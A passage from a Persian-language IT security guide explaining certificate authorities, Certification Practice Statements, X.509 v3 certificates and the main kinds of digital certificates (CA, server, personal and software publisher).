ﭼﻨﺪ ﺗﺎﻻﺭ ﺑﻮﺭﺱ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﻣﺠﺒﻮﺭ ﻛﺮﺩﻧﺪ ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﻪ ﺩﺍﺩ ﻭ ﺳـﺘﺪﻫﺎﻱ ﭘﺮﺑﻬـﺎ ﺑﭙﺮﺩﺍﺯﻧـﺪ،
ﮔﻮﺍﻫﻲﻫﺎﻱ ﻻﺯﻡ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ.
ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺑﺮﻭﻧﺴﭙﺎﺭﻱﺷﺪﻩ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﺩﺭ ﻣﺰﺍﻳﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﻬﻴﻢ ﺑﺎﺷﺪ ،ﺍﻣﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺗﻜﻨﻴﻜﻲ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺁﻧﺮﺍ ﻧﺪﺍﺷﺘﻪ
ﺑﺎﺷﺪ .ﭼﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺧﺎﺭﺟﻲ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺒﻨﺪﺩ ﺗﺎ ﺧﺪﻣﺎﺕ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻭ ﻣﺸﺘﺮﻳﺎﻧﺶ ﻓﺮﺍﻫﻢ ﻛﻨﺪ،
ﺩﺭﺳﺖ ﻣﺜﻞ ﺷﺮﻛﺘﻲ ﻛﻪ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺑﺎ ﻳﻚ ﻣﺮﻛﺰ ﭼﺎﭖ ﻋﻜﺲ ﻗﺮﺍﺭﺩﺍﺩ ﻣﻲﺑﻨﺪﺩ.
ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﻣﻄﻤﺌﻦ
ﻳﻚ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺩﻭﻟﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ﺗﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﺍﺳﺎﻣﻲ ﻗـﺎﻧﻮﻧﻲ
ﺍﻓﺮﺍﺩ ﻭ ﺷﺮﻛﺘﻬﺎ ﭘﻴﻮﻧﺪ ﺩﺍﺩﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻴﭻ ﺭﺍﺑﻄﻪ ﻗﺒﻠﻲ ﻧﺪﺍﺷﺘﻪﺍﻧﺪ ﺍﺟﺎﺯﻩ ﺩﻫـﺪ ﻛـﻪ
ﻫﺮﻳﮏ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺩﻳﮕﺮﻱ ﺗﺼﺪﻳﻖ ﻛﻨﻨﺪ ﻭ ﺑﻪ ﻣﻌﺎﻣﻼﺕ ﻗﺎﻧﻮﻧﻲ ﺑﭙﺮﺩﺍﺯﻧﺪ .ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺑﻮﺳـﻴﻠﺔ ﻳـﻚ ﻣﺮﻛـﺰ ﺟﻬـﺎﻧﻲ ﺻـﺪﻭﺭ
ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻱ ﺭﺍﻧﻨﺪﮔﻲ ﻭ ﻛﺎﺭﺗﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻳﻚ ﺩﻭﻟﺖ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ ﺑﺮﺍﺑﺮﻱ ﻛﻨﻨﺪ.
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﺁﻧﻬﺎ ﺍﺯ ﻗﺒﻞ ﺩﺭ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﻳﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ ﻧـﺸﺪﻩ ﺿـﺮﺭ
ﻛﺮﺩﻩﺍﻧﺪ .ﺍﮔﺮﭼﻪ Microsoftﻭ Netscapeﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺩﺭﻫﺎﻱ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻭﻱ ﻫﺮ ﻣﺮﮐﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ
ﻻﺯﻣﻪﻫﺎﻱ ﺗﺼﺪﻳﻖ ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﺳﺎﺯﺩ ﻣﻲﮔﺸﺎﻳﻨﺪ ،ﺍﻣﺎ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﺍﺻﻠﻲ ﻭﺏ ﺑﺎ ﺗﻌﺪﺍﺩ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻛﻠﻴﺪﻫﺎﻱ CAﻛﻪ ﺑﻪ ﺩﻗﺖ ﺍﻧﺘﺨﺎﺏ
ﺷﺪﻩﺍﻧﺪ ﺗﻮﺯﻳﻊ ﮔﺸﺘﻪﺍﻧﺪ .ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻳﻦ ﻛﻠﻴﺪﻫﺎ ﺩﺭ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﻣﺘﻴﺎﺯ ﺑﺰﺭﮔﻲ ﺑﺮﺍﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻨﺘﺸﺮﻛﻨﻨﺪﺓ ﺁﻧﻬﺎ ﻭ ﻣـﺎﻧﻌﻲ ﺑـﺮﺍﻱ
ﺳﺎﻳﺮﻳﻦ ﺑﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﺮﺍﻱ ﺁﻧﻜﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺻﺎﺩﺭ ﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ،ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺁﻥ ﻣﺮﮐﺰ ﺭﺍ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺷﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ .ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺩﺭ ﻣﺮﻭﺭﮔﺮ ﻭﺏ
ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﺍﺯ ﭘﻴﺶ ﻗﺮﺍﺭﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ .ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﺩﺳﺘﻲ ﻫﻢ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﻧﻬـﺎﻳﻲ ﺍﺿـﺎﻓﻪ
ﺷﻮﻧﺪ.
٣٢٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺳﻴﺎﺳﺖ ﻛﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ )(CPS
ﺳﻴﺎﺳﺖ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ ) ١٣٧(CPSﻳﻚ ﺳﻨﺪ ﻗﺎﻧﻮﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺁﻧﺮﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻒﻛﻨﻨـﺪﻩ ﺧـﻂﻣـﺸﻲﻫـﺎ ﻭ
ﻓﺮﺍﻳﻨﺪﻫﺎ ﺑﺮﺍﻱ ﺻﺪﻭﺭ ﻭ ﺍﺑﻄﺎﻝ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺖ CPS .ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻔﻬـﻮﻡ ﺗﺄﻳﻴـﺪ
ﻳﻚ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﺁﻥ ﻣﺮﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﭼﻴﺴﺖ.
ﺍﺳﻨﺎﺩ CPSﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺗﻮﺳﻂ ﺍﻧﺴﺎﻥ ﻭ ﻧﻪ ﻣﺎﺷﻴﻦ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ .ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﺪ ﮔﻮﺍﻫﻲ ﻳـﻚ ﻣﺮﮐـﺰ
ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺭﺍ ﺿﻤﺎﻧﺖ ﻣﻲﻛﻨﺪ ﻭ ﻓﺮﺽ ﺭﺍ ﺑﺮ ﺳﻄﺢ ﻣﻌﻴﻨـﻲ ﺍﺯ ﺗﻌﻬـﺪ ﺩﺭ ﻗﺒـﺎﻝ ﺩﻧﺒـﺎﻝ
ﻧﺸﺪﻥ ﺧﻂ ﻣﺸﻲﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﮕﺬﺍﺭﺩ -ﻭ ﺑﺨﻮﺍﻫﺪ ﻛﻪ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﻮﺳﻂ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﻣﻌﺘﺒﺮ ﺗﻀﻤﻴﻦ ﺷﺪﻩ ﺑﺎﺷﺪ.
ﮔﻮﺍﻫﻲ X.509 v3
ﺍﮔﺮﭼﻪ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮ ﻧﻮﻋﻲ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺩﺭ ﻋﻤﻞ ﺑﻴﺸﺘﺮ ﺁﻧﻬﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻳﻲ ﺻـﺎﺩﺭ ﻣـﻲﻛﻨﻨـﺪ ﻛـﻪ ﻃﺒـﻖ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ X.509 v3ﻫﺴﺘﻨﺪ .ﻣﺸﺎﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ،ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻭ ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﺟﻤﻠـﻪ SSLﺗﻨﻬـﺎ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻣﺠﻮﺯﻫﺎﻱ X.509 v3ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ .ﺗﻨﻬﺎ ﺍﺳﺘﺜﻨﺎﺀ ﻣﻬﻢ ﺩﺭ ﺍﻳﻨﺠﺎ PGPﺍﺳﺖ ،ﻛﻪ ﺍﺯ ﻗﺎﻟﺐ ﮔﻮﺍﻫﻲ ﻣﺨـﺼﻮﺹ ﺑـﻪ ﺧـﻮﺩﺵ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﺪ ،ﺍﮔﺮﭼﻪ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺁﻥ ﺑﻌﻀﻲ ﺍﺯ ﻣﺠﻮﺯﻫﺎﻱ X.509ﺭﺍ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲﻛﻨﻨﺪ) .ﺑﺮﻧﺎﻣـﻪ SSHﺍﺯ ﻣﺠﻮﺯﻫـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﻛﻨـﺪ ،ﺍﻣـﺎ
ﺩﺭﻋﻮﺽ ﻣﺘﻜﻲ ﺑﻪ ﺗﺄﻳﻴﺪ ﺷﺨﺼﻲ ﻛﻠﻴﺪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺖ(.
ﻫﺮ ﮔﻮﺍﻫﻲ X.509ﺷﺎﻣﻞ ﻳﻚ ﺷﻤﺎﺭﺓ ﻧﺴﺨﻪ ،ﺷﻤﺎﺭﺓ ﺳﺮﻳﺎﻝ ،ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ،ﺍﻃﻼﻋـﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺍﻟﮕـﻮﺭﻳﺘﻢ ،ﻭ ﺍﻣـﻀﺎﻱ ﻣﺮﻛـﺰ
ﺻﺎﺩﺭﻛﻨﻨﺪﺓ ﮔﻮﺍﻫﻲ ﺍﺳﺖ .ﺻﻨﻌﺖ ﺑﺠﺎﻱ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﻭﻟﻴﻪ ،X.509ﮔﻮﺍﻫﻲﻫﺎﻱ X.509 v3ﺭﺍ ﺑﺮﮔﺰﻳﺪ ،ﭼـﻮﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ X.509 v3
ﺍﺟﺎﺯﻩ ﻣﻲﺩﺍﺩ ﻛﻪ "ﻧﺎﻡ" ﻭ "ﻣﻘﺪﺍﺭ" ﺩﻟﺨﻮﺍﻩ ﺑﺘﻮﺍﻧﻨﺪ ﻣﺸﻤﻮﻝ ﮔﻮﺍﻫﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺷﻮﻧﺪ .ﺍﻳﻦ ﺩﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﺑـﺴﻴﺎﺭﻱ ﺑﻜـﺎﺭ ﺭﻭﻧـﺪ ﻭ
ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎ ﺑﺪﻭﻥ ﺗﻐﻴﻴﺮ ﭘﺮﻭﺗﻜﻞ ﻣﺮﺑﻮﻃﻪ ﮔﺴﺘﺮﺵ ﻳﺎﺑﺪ.
ﺍﻧﻮﻉ ﮔﻮﺍﻫﻲﻫﺎ
ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺍﻣﺮﻭﺯ ﭼﻬﺎﺭ ﻧﻮﻉ ﻣﺠﻮﺯ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ:
ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ
ﻻ
ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻭ ﻧﺎﻡ ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻳﺎ ﻧﺎﻡ ﺧﺪﻣﺎﺕ ﺧﺎﺻﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺁﻥ ﮔﻮﺍﻫﻲ ﺻﺎﺩﺭ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ "ﺧﻮﺩ ﺍﻣﻀﺎ" ﻫﺴﺘﻨﺪ -ﻳﻌﻨﻲ ﺑﺎ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ CAﺍﻣﻀﺎ ﺷﺪﻩﺍﻧﺪ .ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻫﻤﭽﻨﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ
ﺯﻧﺠﻴﺮﻩﺍﻱ ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲ ﻛﻨﻨﺪ ﻳﺎ ﻛﻠﻴﺪﻫﺎﻱ ﻳﻜﺪﻳﮕﺮ ﺭﺍ ﺍﻣﻀﺎ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻨﻜﻪ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺯﻧﺠﻴﺮﻩﺍﻱ ﻭﺍﻗﻌﹰﺎ ﭼﻪ ﻣﻔﻬﻮﻣﻲ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ
ﻫﻤﭽﻨﺎﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺳﺆﺍﻝ ﻣﻄﺮﺡ ﺍﺳﺖ .ﺑﺮﻧﺎﻣﻪﻫﺎﻱ Netscape ،Microsoft Internet Explorer ،Microsoft Windows
،Navigatorﻭ ،open SSLﻫﻤﻪ ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﻴﺶ ﺍﺯ ﺩﻩ ﮔﻮﺍﻫﻲ ﺍﺯ ﻣﺮﺍﮐﺰ ﻣﺨﺘﻠﻒ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺩﺭ ﺑﺎﺯﺍﺭ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ.
ﺩﺭ ﻓﻬﺮﺳﺖ CAﻫﺎﻳﻲ ﻛﻪ ﻫﻤﺮﺍﻩ ﻣﺮﻭﺭﮔﺮﻫﺎﻱ ﻭﺏ ﺗﻮﺯﻳﻊ ﺷﺪﻩﺍﻧﺪ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﺩﺍﺭﻧﺪ VerSign .ﺑﺎ ﺑـﻴﺶ ﺍﺯ
۲۰ﮔﻮﺍﻫﻲ ﻣﺨﺘﻠﻒ ﺑﻴﺸﺘﺮﻳﻦ ﺗﻌﺪﺍﺩ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺩﺍﺭﺩ .ﺍﻣﻀﺎﻫﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻛﻠﻴﺪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻣﺘﻔﺎﻭﺕ ﺑﻴـﺎﻧﮕﺮ ﺳـﻄﻮﺡ ﻣﺨﺘﻠـﻒ
ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺍﻋﺘﺒﺎﺭ ﻫﺴﺘﻨﺪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺷﺎﻣﻞ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ،SSLﻧـﺎﻡ ﺳـﺎﺯﻣﺎﻧﻲ ﻛـﻪ ﺁﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺍﺟـﺮﺍ ﻣـﻲﻛﻨـﺪ ،ﻭ ﻧـﺎﻡ DNS
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺳﺖ .ﻫﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﻗﺎﺑﻠﻴﺖ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺎﻳﺪ ﻳﻚ ﮔـﻮﺍﻫﻲ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺮﺍﻱ ﭘﺮﻭﺗﻜـﻞ
ﺭﻣﺰﻧﮕﺎﺭﻱ SSLﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﺪﺭﺳﺘﻲ ﻋﻤﻞ ﻛﻨﺪ .ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﺻﻠﻲ ﺻﺪﻭﺭ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﻛﻤﻚ ﺑـﻪ ﻣـﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺗـﺸﺨﻴﺺ
137 Certification Practices Statement
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٢٣
ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤﻼﺕ ﻓﺮﺩ-ﺩﺭ-ﻣﻴﺎﻥ-ﺭﺍﻩ ١٣٨ﺍﺳﺖ ،ﺍﻣﺎ ﺩﺭ ﻋﻤـﻞ ﻣﺠﻮﺯﻫـﺎﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﻴﺶ ﺍﺯ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺷﺨﺼﻲ
ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺷﺎﻣﻞ ﻧﺎﻡ ﻳﻚ ﺷﺨﺺ ﻭ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻫﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺩﻳﮕﺮﻱ ﻣﺎﻧﻨﺪ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﺁﺩﺭﺱ
ﭘﺴﺘﻲ ،ﻭ ﺗﺎﺭﻳﺦ ﺗﻮﻟﺪ ﺷﺨﺺ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﺷﻮﻧﺪ .ﺁﻧﻬﺎ ﺑﻮﺳﻴﻠﺔ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﺷﺎﻏﻠﻴﻦ ﻳﺎ ﻣﺸﺘﺮﻳﺎﻧﺸﺎﻥ ﺻﺎﺩﺭ ﻣﻲﺷﻮﻧﺪ .ﻣﺠﻮﺯﻫﺎﻱ ﺷﺨﺼﻲ
ﺫﺍﺗﹰﺎ ﻳﻚ ﺭﻭﺵ ﺍﻳﻤﻦﺗﺮ ﺑﺮﺍﻱ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺧﻮﺩﺷﺎﻥ ﺭﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻭ ﺷﻨﺎﺳﻪ ﻛﺎﺭﺑﺮﻱ ﻣﻌﺮﻓـﻲ ﻛﻨﻨـﺪ .ﺁﻧﻬـﺎ ﻫﻤﭽﻨـﻴﻦ
ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺮﻭﺗﻜﻞ ﺭﻣﺰﻧﮕﺎﺭﻱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ S/MIMEﻻﺯﻡ ﻫﺴﺘﻨﺪ.
ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ
ﺍﻳﻦ ﻣﺠﻮﺯﻫﺎ ﺑﺮﺍﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻣﻀﺎﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﻣﺎﻧﻨﺪ ﺍﺟﺰﺍﻱ ActiveXﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺍﺟﺮﺍﻳﻲ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓـﺖ ﺍﺯ
ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ .ﻫﺮﻳﻚ ﺍﺯ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺧﻴﺮ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ Windowsﺑﻪ ﻫﻤﺮﺍﻩ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺗﻮﺯﻳﻊﻛﻨﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻨﺘﺸﺮ
ﺷﺪﻩ ﻛﻪ ﻫﺮ ﻛﺪﺍﻡ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﺻﺤﺖ ﺍﻣﻀﺎﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺭﻭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ Windowsﺑﻜﺎﺭ ﺭﻭﻧﺪ.
ﻣﺠﻮﺯﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ
